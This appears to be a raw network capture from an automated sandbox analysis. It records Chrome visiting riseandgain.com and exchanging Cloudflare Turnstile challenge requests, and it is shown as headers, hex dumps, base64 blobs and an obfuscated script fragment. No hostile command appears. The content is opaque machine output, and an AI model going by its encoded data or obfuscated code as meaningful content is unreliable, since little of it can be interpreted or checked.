                                                2024-08-20 13:42:00 UTC1369INData Raw: 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 44 5b 68 47 28 31 30 34 39 29 5d 28 4d 29 2c 73 5b 42 2b 2b 5d 3d 64 5b 68 47 28 31 38 30 39 29 5d 28 45 2c 4d 5b 68 47 28 31 36 36 32 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4d 2c 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 68 47 28 31 30 36 32 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 7a 28 31 36 31 33 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 49 28 39 39 34 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 31 33 38 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 5a 29 7b 69 66 28 68 5a 3d 67 49 2c 65 4d 5b 68 5a 28 39 39 34 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 5a 28 39 39 34 29 5d 3d 21 21 5b 5d 7d 2c 66 7a 3d 30 2c 65 4e 5b 67 49 28 38 30 31 29 5d 3d 3d 3d 67 49 28 38 35 32
                                                Data Ascii: );else return null;D[hG(1049)](M),s[B++]=d[hG(1809)](E,M[hG(1662)](0)),x--,E=M,x==0&&(x=Math[hG(1062)](2,C),C++)}}},g={},g[hz(1613)]=f.h,g}(),eM[gI(994)]=![],eM[gI(1382)]=function(hZ){if(hZ=gI,eM[hZ(994)])return;eM[hZ(994)]=!![]},fz=0,eN[gI(801)]===gI(852


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                28192.168.2.1649752162.241.87.1134435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:00 UTC586OUTGET /favicon.ico HTTP/1.1
                                                Host: riseandgain.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: no-cors
                                                Sec-Fetch-Dest: image
                                                Referer: https://riseandgain.com/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:00 UTC164INHTTP/1.1 404 Not Found
                                                Date: Tue, 20 Aug 2024 13:42:00 GMT
                                                Server: Apache
                                                Content-Length: 315
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                2024-08-20 13:42:00 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                29192.168.2.1649753104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:00 UTC926OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Content-Length: 2673
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                Content-type: application/x-www-form-urlencoded
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                CF-Challenge: 2245aa7fb0a0c67
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Origin: https://challenges.cloudflare.com
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:00 UTC2673OUTData Raw: 76 5f 38 62 36 32 63 64 64 33 32 64 39 37 31 38 62 31 3d 6d 67 30 55 24 55 4a 55 48 55 76 55 32 55 50 6a 52 38 6a 52 6c 36 56 6c 56 76 37 2d 56 37 52 56 36 65 76 53 56 64 65 52 4f 6a 52 56 53 6c 52 49 52 66 69 52 4f 6c 58 31 52 78 54 55 56 55 65 67 52 62 66 48 52 56 48 52 53 36 56 44 24 72 35 45 54 58 52 6f 55 39 70 52 66 70 30 4a 30 61 34 52 4e 4d 24 47 52 6c 31 56 76 35 50 6e 52 56 63 52 6e 66 35 68 70 52 24 48 6d 73 69 63 73 4f 52 39 76 35 57 31 37 4d 64 51 38 33 7a 33 63 52 4a 4a 4b 78 34 65 30 52 2d 5a 55 52 53 48 4c 53 35 65 65 55 50 30 46 6a 52 35 6c 52 30 43 32 55 4b 55 39 61 64 4a 55 52 65 4d 43 53 32 4e 70 52 33 55 56 61 52 37 72 75 67 58 58 52 62 48 65 31 52 4e 67 52 78 48 4c 63 6c 4d 77 52 4f 73 52 54 79 51 36 31 72 31 52 62 30 6c 6f 70 6c 52
                                                Data Ascii: v_8b62cdd32d9718b1=mg0U$UJUHUvU2UPjR8jRl6VlVv7-V7RV6evSVdeROjRVSlRIRfiROlX1RxTUVUegRbfHRVHRS6VD$r5ETXRoU9pRfp0J0a4RNM$GRl1Vv5PnRVcRnf5hpR$HmsicsOR9v5W17MdQ83z3cRJJKx4e0R-ZURSHLS5eeUP0FjR5lR0C2UKU9adJUReMCS2NpR3UVaR7rugXXRbHe1RNgRxHLclMwROsRTyQ61r1Rb0loplR
                                                2024-08-20 13:42:00 UTC747INHTTP/1.1 200 OK
                                                Date: Tue, 20 Aug 2024 13:42:00 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 151456
                                                Connection: close
                                                cf-chl-gen: ZIXzlZmyf+nX7npfTw4bVYwtDiWLmDtCGIaSrVikQAAC00pcR4P721EJ3AFIjEemppUlcwCBc3nZfTyldEATpMXLxM4AuupsYu9oneTfONjlomec1745VoUCXs3TiLWSmFOYLE0QuT/1KACK3gAbjrejsGx2JVUEPWoUYY+Xgd8K7fq1gW4FGPuKhnMABCU6Gcio7w46Ul10v1ydaoeLzHp1vDAidK2ahCWWqAR3BZWYOFCztXc6eFA4+opD1F41G+LienN0BYGlTDW6JH5UtivM11CNA6FWAUXK4dlyu1DY9aRE0a9LFFP6MZd6bLJOLGP4D1BoIsL80xV13EzuahMcd6mnuTgNQkVGCNfvIWZjrmWibjUbtCzKg3bmyV7qp9MyxNeWAiFOV9LWSrcbWGG4TC/TAncgAUzpY8/VQ2ssEpzQxw4uYtO4QxzDDm48gVd1pS6G1CZ4TsXP5Oaj3Gzkkix1NCAH09Nr6QVbJbSPDHA=$PILoCARTdWc8VxEY
                                                Server: cloudflare
                                                CF-RAY: 8b62cdddaf5b0ca0-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:00 UTC622INData Raw: 74 34 39 33 6e 36 36 65 6b 36 4b 67 6f 4c 36 78 6d 38 69 34 6c 6f 5a 2f 74 6f 71 49 6b 5a 79 73 6f 35 2b 52 74 36 43 5a 75 4a 6e 5a 73 63 61 66 6d 4c 72 67 32 72 4b 74 76 61 43 68 31 4e 76 56 71 38 33 6b 32 63 4b 36 34 4c 79 75 74 4d 33 56 39 4f 6a 34 39 4d 72 46 79 62 6d 35 32 4d 33 31 39 73 34 46 41 4e 62 67 44 4f 58 44 34 4d 6a 74 44 76 7a 37 35 73 73 51 41 51 4c 74 38 67 6e 6a 31 67 6b 4d 37 53 41 44 36 67 37 35 37 68 6a 5a 35 68 54 35 39 2b 6f 59 2f 4f 77 75 4c 75 76 7a 36 7a 45 58 49 67 30 54 4b 51 59 37 4a 2f 66 2b 39 79 76 37 39 55 51 43 46 7a 38 61 46 43 6a 39 51 67 78 4e 54 6b 67 76 45 51 59 30 4d 55 59 55 56 69 4e 5a 50 42 4d 64 50 52 4a 65 54 43 34 76 59 6d 4e 50 4a 57 55 71 4e 31 5a 42 51 45 78 64 4a 32 55 71 4c 32 55 7a 62 6d 49 76 52 55 35
                                                Data Ascii: t493n66ek6KgoL6xm8i4loZ/toqIkZyso5+Rt6CZuJnZscafmLrg2rKtvaCh1NvVq83k2cK64LyutM3V9Oj49MrFybm52M319s4FANbgDOXD4MjtDvz75ssQAQLt8gnj1gkM7SAD6g757hjZ5hT59+oY/OwuLuvz6zEXIg0TKQY7J/f+9yv79UQCFz8aFCj9QgxNTkgvEQY0MUYUViNZPBMdPRJeTC4vYmNPJWUqN1ZBQExdJ2UqL2UzbmIvRU5
                                                2024-08-20 13:42:00 UTC1369INData Raw: 35 35 69 58 42 50 66 32 65 50 64 59 5a 70 5a 4a 5a 39 56 46 35 75 58 71 42 6a 62 35 53 6a 6b 5a 46 34 5a 57 75 4d 6c 33 32 73 73 48 35 37 62 32 70 74 64 6f 61 46 70 71 36 75 75 70 6d 6f 6e 61 79 79 6b 70 4b 6b 78 5a 6d 51 77 63 47 37 6e 61 6a 46 76 4b 47 73 68 38 65 71 73 34 79 74 30 4a 6a 4a 6f 38 75 39 32 4d 36 33 6d 4d 47 77 72 73 2f 46 32 36 50 6f 78 37 53 36 36 4c 6a 74 36 4d 6a 47 72 4e 76 68 37 72 61 76 39 4e 72 78 75 65 37 54 35 38 69 33 79 75 76 41 2f 75 33 45 76 65 66 41 39 74 37 43 34 64 33 59 2f 74 6f 52 36 50 7a 56 46 63 6e 34 34 67 33 72 39 2b 73 54 44 39 2f 5a 2b 2b 44 6a 33 51 41 67 35 2b 45 45 46 4f 76 6c 43 41 4c 76 36 51 6e 77 38 2b 30 4e 4d 50 66 78 45 53 54 37 39 52 55 53 41 50 6b 61 41 51 54 39 48 6b 41 49 41 69 49 30 44 41 59 72 44
                                                Data Ascii: 55iXBPf2ePdYZpZJZ9VF5uXqBjb5SjkZF4ZWuMl32ssH57b2ptdoaFpq6uupmonayykpKkxZmQwcG7najFvKGsh8eqs4yt0JjJo8u92M63mMGwrs/F26Pox7S66Ljt6MjGrNvh7rav9Nrxue7T58i3yuvA/u3EvefA9t7C4d3Y/toR6PzVFcn44g3r9+sTD9/Z++Dj3QAg5+EEFOvlCALv6Qnw8+0NMPfxEST79RUSAPkaAQT9HkAIAiI0DAYrD
                                                2024-08-20 13:42:00 UTC1369INData Raw: 30 62 6f 46 30 63 6c 71 4b 63 33 78 73 6e 31 69 67 59 31 31 37 58 6e 75 52 6f 35 79 4b 70 57 68 39 6a 71 6c 78 70 35 4b 74 64 5a 57 57 73 58 6d 4f 73 36 65 51 73 4a 43 34 6b 34 78 39 78 59 53 51 67 4d 54 45 75 37 36 2f 6e 61 4b 67 6e 36 4f 68 6a 61 61 68 79 39 62 51 75 4c 4f 6c 31 36 33 52 73 39 75 78 73 5a 61 32 73 64 75 6e 34 36 69 30 71 38 32 6b 72 37 2f 41 71 76 44 63 73 2f 4f 32 35 4c 6d 79 75 39 32 37 33 2f 6a 65 75 2b 44 79 75 75 33 6c 33 67 6a 49 33 67 54 70 41 4d 72 39 30 4d 63 43 30 76 4c 31 43 78 49 4c 34 77 51 63 48 68 6a 79 44 77 2f 70 34 76 72 76 46 65 58 34 42 79 48 31 49 43 73 73 37 50 6a 76 45 76 72 79 4c 69 55 7a 49 77 67 56 4c 51 55 37 50 67 30 49 38 67 4c 35 50 78 63 47 2f 52 30 79 4b 55 67 66 53 69 63 48 53 55 34 62 51 42 4d 6a 46 6c
                                                Data Ascii: 0boF0clqKc3xsn1igY117XnuRo5yKpWh9jqlxp5KtdZWWsXmOs6eQsJC4k4x9xYSQgMTEu76/naKgn6Ohjaahy9bQuLOl163Rs9uxsZa2sdun46i0q82kr7/AqvDcs/O25Lmyu9273/jeu+Dyuu3l3gjI3gTpAMr90McC0vL1CxIL4wQcHhjyDw/p4vrvFeX4ByH1ICss7PjvEvryLiUzIwgVLQU7Pg0I8gL5PxcG/R0yKUgfSicHSU4bQBMjFl
                                                2024-08-20 13:42:00 UTC1369INData Raw: 5a 6c 6d 55 63 61 47 63 6a 6d 52 36 65 59 57 57 61 57 69 44 6e 4b 2b 50 72 57 65 6d 72 32 61 66 64 71 4e 79 64 37 64 79 65 61 69 37 69 70 43 68 65 4a 68 36 6c 48 32 79 6c 35 54 4a 74 62 69 64 76 4d 71 64 77 63 72 53 6a 4d 2b 71 7a 37 58 46 6b 4d 36 62 6d 73 36 79 33 75 47 77 71 36 2b 66 70 62 79 6c 75 64 6a 6d 75 64 33 6d 37 71 7a 72 78 75 76 52 34 71 7a 71 74 37 62 71 7a 76 72 39 7a 4d 66 58 37 66 37 42 42 74 54 32 31 39 76 69 36 67 51 48 2b 76 66 61 34 67 58 78 36 74 41 44 37 41 34 4a 32 4f 34 4c 44 74 33 5a 43 64 6e 54 32 75 48 57 35 42 66 33 2b 77 4d 4c 4a 43 63 4f 47 50 6f 44 4a 52 49 68 38 43 4d 4e 4c 69 6e 34 44 79 73 75 2b 2f 6f 41 44 42 70 41 4c 77 38 51 52 44 49 54 42 55 6f 4c 48 43 77 2f 49 43 45 38 49 6c 4e 44 48 78 41 76 4b 45 55 56 4c 6b 38
                                                Data Ascii: ZlmUcaGcjmR6eYWWaWiDnK+PrWemr2afdqNyd7dyeai7ipCheJh6lH2yl5TJtbidvMqdwcrSjM+qz7XFkM6bms6y3uGwq6+fpbyludjmud3m7qzrxuvR4qzqt7bqzvr9zMfX7f7BBtT219vi6gQH+vfa4gXx6tAD7A4J2O4LDt3ZCdnT2uHW5Bf3+wMLJCcOGPoDJRIh8CMNLin4Dysu+/oADBpALw8QRDITBUoLHCw/ICE8IlNDHxAvKEUVLk8
                                                2024-08-20 13:42:00 UTC1369INData Raw: 36 5a 79 70 46 35 68 61 47 57 63 68 49 53 48 72 36 32 45 5a 62 4b 57 72 5a 53 77 6b 6f 6d 71 71 4b 79 36 74 63 43 30 66 37 69 59 6e 35 69 39 79 4c 32 68 69 5a 65 46 6a 49 6a 4e 71 4e 4f 63 31 4d 69 31 78 4a 54 45 73 72 76 59 6e 4c 4c 58 76 63 37 61 75 36 44 66 75 72 54 61 73 64 4f 30 71 75 65 39 72 4d 33 65 36 73 75 77 37 38 58 6a 39 75 62 49 30 72 61 30 75 76 72 66 33 62 76 5a 2f 64 69 2b 76 63 54 32 35 39 76 38 7a 4e 30 50 2f 74 7a 53 30 78 4c 75 46 68 54 75 36 77 33 30 32 74 73 57 33 52 6e 72 47 76 37 57 45 75 59 55 35 78 73 47 36 69 73 59 4a 67 33 74 4b 66 6f 43 4d 79 49 4d 4a 76 45 56 4b 7a 59 6e 2f 42 4d 4b 4d 2f 63 59 48 7a 56 44 48 43 50 36 52 79 41 6e 43 6b 73 6b 4b 77 70 50 4b 44 45 72 50 6a 45 76 46 30 63 77 4f 53 6c 63 46 56 30 67 47 6a 67 69
                                                Data Ascii: 6ZypF5haGWchISHr62EZbKWrZSwkomqqKy6tcC0f7iYn5i9yL2hiZeFjIjNqNOc1Mi1xJTEsrvYnLLXvc7au6DfurTasdO0que9rM3e6suw78Xj9ubI0ra0uvrf3bvZ/di+vcT259v8zN0P/tzS0xLuFhTu6w302tsW3RnrGv7WEuYU5xsG6isYJg3tKfoCMyIMJvEVKzYn/BMKM/cYHzVDHCP6RyAnCkskKwpPKDErPjEvF0cwOSlcFV0gGjgi
                                                2024-08-20 13:42:00 UTC1369INData Raw: 43 71 6c 33 78 33 68 6d 4f 78 63 62 57 43 62 72 43 77 73 49 4b 4a 75 71 6c 38 69 4d 43 30 6e 5a 68 39 6d 48 79 44 76 63 61 2f 6f 71 76 44 72 36 4b 47 70 61 61 63 77 71 43 51 30 4a 62 4f 6c 4d 54 4d 74 74 4f 56 76 39 66 42 30 35 71 35 75 72 44 57 74 4b 62 6e 75 71 50 73 72 65 44 4f 79 66 54 51 70 2b 2f 34 31 4c 6e 7a 2f 4e 6e 59 38 76 48 78 73 37 77 46 34 64 37 61 33 73 61 2f 33 2b 62 35 41 51 63 4c 7a 41 55 4c 44 78 51 4a 44 78 58 70 44 52 4d 5a 36 52 45 58 48 65 6b 56 47 79 45 51 47 52 38 6c 43 68 30 6a 4b 51 6f 68 4a 79 30 4b 4a 53 73 77 4d 43 6b 76 4e 44 48 32 4a 54 77 30 2f 42 4d 56 2b 77 2f 30 52 55 4e 44 42 79 59 44 4e 6b 51 58 46 53 34 58 44 67 38 68 55 43 67 30 4e 46 4e 51 53 79 51 79 58 53 31 52 53 45 73 63 4c 43 78 54 56 46 56 68 56 6c 49 6f 54
                                                Data Ascii: Cql3x3hmOxcbWCbrCwsIKJuql8iMC0nZh9mHyDvca/oqvDr6KGpaacwqCQ0JbOlMTMttOVv9fB05q5urDWtKbnuqPsreDOyfTQp+/41Lnz/NnY8vHxs7wF4d7a3sa/3+b5AQcLzAULDxQJDxXpDRMZ6REXHekVGyEQGR8lCh0jKQohJy0KJSswMCkvNDH2JTw0/BMV+w/0RUNDByYDNkQXFS4XDg8hUCg0NFNQSyQyXS1RSEscLCxTVFVhVlIoT
                                                2024-08-20 13:42:00 UTC1369INData Raw: 37 6f 70 47 77 62 49 42 7a 73 49 6d 45 72 70 32 47 75 48 61 51 65 61 36 54 6b 4d 57 78 74 4d 43 56 71 59 65 32 6f 37 32 6c 6b 63 4b 6e 76 49 2f 46 78 61 57 50 7a 63 58 45 78 62 57 71 71 4e 69 35 35 4d 47 79 33 2b 6a 46 74 65 50 73 79 4b 76 6e 38 4d 79 75 36 2f 54 51 73 65 2f 34 31 4c 54 7a 2f 4e 69 7a 39 77 48 63 73 2f 73 46 34 4d 55 41 43 65 58 6b 2f 76 33 39 76 38 67 52 37 65 72 6d 36 74 4c 4c 36 2f 49 46 79 2b 67 51 32 74 55 58 47 79 41 56 47 79 48 31 47 52 38 6c 39 52 30 6a 4b 66 55 68 4a 79 30 63 4a 53 73 78 46 69 6b 76 4e 52 55 45 44 52 59 52 4b 77 30 58 4d 67 44 30 4d 79 4d 76 4c 78 73 6e 52 79 51 2b 4c 55 63 34 4f 53 39 4a 55 45 4d 55 54 7a 68 52 4e 31 42 57 46 78 52 58 51 44 4d 2f 57 42 35 67 59 31 39 50 59 55 64 67 4e 56 38 73 58 69 31 48 59 47
                                                Data Ascii: 7opGwbIBzsImErp2GuHaQea6TkMWxtMCVqYe2o72lkcKnvI/FxaWPzcXExbWqqNi55MGy3+jFtePsyKvn8Myu6/TQse/41LTz/Niz9wHcs/sF4MUACeXk/v39v8gR7erm6tLL6/IFy+gQ2tUXGyAVGyH1GR8l9R0jKfUhJy0cJSsxFikvNRUEDRYRKw0XMgD0MyMvLxsnRyQ+LUc4OS9JUEMUTzhRN1BWFxRXQDM/WB5gY19PYUdgNV8sXi1HYG
                                                2024-08-20 13:42:00 UTC1369INData Raw: 6b 4b 36 75 76 4b 75 53 72 61 43 68 6f 71 32 6b 6a 72 4f 44 70 35 66 42 67 5a 79 62 6e 4a 32 66 6e 35 71 79 68 72 4c 56 7a 38 58 5a 6f 38 72 4c 7a 4e 33 4e 72 5a 66 56 7a 63 7a 61 70 64 58 49 79 63 72 56 7a 4c 62 62 71 38 2b 2f 36 61 6e 45 77 38 54 46 78 38 66 43 32 71 37 61 2f 66 66 71 77 4e 62 59 76 39 4c 53 35 4c 38 48 79 75 6e 47 2b 51 6a 61 32 50 48 61 30 64 4c 6b 46 4f 76 33 39 78 63 55 44 2b 66 31 49 66 41 56 44 41 2f 68 49 50 72 77 46 2f 37 6c 46 67 50 73 35 67 51 49 43 2f 45 49 49 66 51 32 4d 69 59 53 4e 2f 6b 2b 43 2f 6b 70 2b 51 48 36 50 6a 49 59 2f 6a 38 55 50 6b 4d 6b 46 6b 73 6a 51 30 4d 63 50 45 52 47 55 43 59 68 53 68 6c 5a 4d 45 6f 72 57 78 35 69 59 6d 45 6b 54 53 4e 66 51 44 4a 6b 4f 6c 74 41 4e 6b 78 48 62 31 78 42 53 79 39 43 4c 7a 5a
                                                Data Ascii: kK6uvKuSraChoq2kjrODp5fBgZybnJ2fn5qyhrLVz8XZo8rLzN3NrZfVzczapdXIycrVzLbbq8+/6anEw8TFx8fC2q7a/ffqwNbYv9LS5L8HyunG+Qja2PHa0dLkFOv39xcUD+f1IfAVDA/hIPrwF/7lFgPs5gQIC/EIIfQ2MiYSN/k+C/kp+QH6PjIY/j8UPkMkFksjQ0McPERGUCYhShlZMEorWx5iYmEkTSNfQDJkOltANkxHb1xBSy9CLzZ
                                                2024-08-20 13:42:00 UTC1369INData Raw: 35 47 76 6b 4d 53 6b 6d 72 69 6e 73 5a 65 2b 6c 49 4c 4e 71 72 65 47 30 61 36 76 69 6f 32 52 6a 71 47 77 7a 73 37 63 79 37 4c 4e 77 4d 48 43 7a 63 53 75 30 36 50 48 74 2b 47 68 76 4c 75 38 76 62 2b 2f 75 74 4b 6d 30 76 58 76 35 66 6e 44 36 75 76 73 2f 65 33 4e 74 2f 58 74 37 50 72 46 39 65 6a 70 36 76 58 73 31 76 76 4c 37 39 38 4b 79 65 54 6a 35 4f 58 6e 35 2b 4c 36 7a 76 6f 65 47 41 76 67 39 76 6a 66 38 76 49 63 4a 79 66 71 43 75 59 61 4b 50 72 34 45 76 72 78 38 67 55 30 44 42 67 59 4e 7a 51 76 43 42 5a 42 45 54 55 73 4c 77 4a 41 47 78 45 36 43 6b 6f 68 4f 51 31 4e 4f 7a 6b 51 55 44 31 54 51 43 59 68 52 79 38 57 52 6a 4d 64 46 7a 51 34 4f 79 49 34 55 53 56 6d 59 6c 5a 43 5a 79 70 75 4f 79 70 5a 4b 6a 45 72 62 6d 4a 49 4c 32 39 45 62 6e 4e 55 52 6e 74 4f
                                                Data Ascii: 5GvkMSkmrinsZe+lILNqreG0a6vio2RjqGwzs7cy7LNwMHCzcSu06PHt+GhvLu8vb+/utKm0vXv5fnD6uvs/e3Nt/Xt7PrF9ejp6vXs1vvL798KyeTj5OXn5+L6zvoeGAvg9vjf8vIcJyfqCuYaKPr4Evrx8gU0DBgYNzQvCBZBETUsLwJAGxE6CkohOQ1NOzkQUD1TQCYhRy8WRjMdFzQ4OyI4USVmYlZCZypuOypZKjErbmJIL29EbnNURntO


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                30192.168.2.1649755104.18.94.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:01 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1617668413:1724159622:eUR_OoHan022D1jqK4hTlRSv3-8-mo2Kr9Sxb8iUsXo/8b62cdd32d9718b1/2245aa7fb0a0c67 HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                Accept: */*
                                                Sec-Fetch-Site: none
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:01 UTC379INHTTP/1.1 404 Not Found
                                                Date: Tue, 20 Aug 2024 13:42:01 GMT
                                                Content-Type: application/json
                                                Content-Length: 7
                                                Connection: close
                                                cf-chl-out: hZl+dhMPO7ofsNVEKQc/MsRgoCB8IJjbivE=$PDA8SgANGxy5CPwT
                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                Server: cloudflare
                                                CF-RAY: 8b62cde3aecb42e8-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-08-20 13:42:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                Data Ascii: invalid


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                31192.168.2.1649756104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:01 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8b62cdd32d9718b1/1724161320639/3888b8147d1e4e8d5dfb484f0c0e0a762cb1be53c184273959697968fd2372dd/mhw0YNMa9duS1Qm HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                Cache-Control: max-age=0
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: */*
                                                Sec-Fetch-Site: same-origin
                                                Sec-Fetch-Mode: cors
                                                Sec-Fetch-Dest: empty
                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xbh34/0x4AAAAAAAhidKplJ_I6A90O/auto/fbE/normal/auto/
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-US,en;q=0.9
                                                2024-08-20 13:42:01 UTC143INHTTP/1.1 401 Unauthorized
                                                Date: Tue, 20 Aug 2024 13:42:01 GMT
                                                Content-Type: text/plain; charset=UTF-8
                                                Content-Length: 1
                                                Connection: close
                                                2024-08-20 13:42:01 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4f 49 69 34 46 48 30 65 54 6f 31 64 2d 30 68 50 44 41 34 4b 64 69 79 78 76 6c 50 42 68 43 63 35 57 57 6c 35 61 50 30 6a 63 74 30 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gOIi4FH0eTo1d-0hPDA4KdiyxvlPBhCc5WWl5aP0jct0AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                2024-08-20 13:42:01 UTC1INData Raw: 4a
                                                Data Ascii: J


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                32192.168.2.1649757104.18.95.414435912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-20 13:42:02 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8b62cdd32d9718b1/1724161320643/HVxKxYYx_BryrmK HTTP/1.1
                                                Host: challenges.cloudflare.com
                                                Connection: keep-alive
                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                sec-ch-ua-mobile: ?0
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                sec-ch-ua-platform: "Windows"
                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
